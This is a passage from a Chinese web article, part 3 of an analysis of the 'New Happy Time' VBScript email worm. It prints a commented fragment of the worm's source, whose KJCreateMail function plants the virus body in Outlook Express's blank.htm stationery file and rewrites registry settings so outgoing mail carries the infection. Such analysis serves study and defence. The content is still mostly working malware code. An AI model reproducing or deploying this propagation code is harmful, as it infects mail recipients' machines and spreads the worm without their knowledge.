新欢乐时光代码分析(3)

日期：2020-05-12 栏目：黑客生涯浏览：次

    End If
End Function

' 函数：KJCreateMail()
' 功能：感染邮件部分

Function KJCreateMail()
    On Error Resume Next
    ' 如果当前执行文件是"html"的，就退出函数
    If InWhere = "html" Then
        Exit Function
    End If
    ' 取系统盘的空白页的路径
    ShareFile = Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
    ' 如果存在这个文件，就向其追加html的病毒体
    ' 否则生成含有病毒体的这个文件
    If (FSO.FileExists(ShareFile)) Then
        Call KJAppendTo(ShareFile, "html")
    Else
        Set FileTemp = FSO.OpenTextFile(ShareFile, 2, true)
        FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
        FileTemp.Close
    End If
    ' 取得当前用户的ID和OutLook的版本
    DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
    OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
    ' 激活信纸功能，并感染所有信纸
    WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion, 1) &".0\Mail\Compose Use Stationery", 1, "REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion, 1) &".0\Mail\Stationery Name", ShareFile)
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion, 1) &".0\Mail\Wide Stationery Name", ShareFile)
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference", 131072, "REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")

转载注明出处：http://www.heiqu.com/1492.html

新欢乐时光代码分析(3)

相关推荐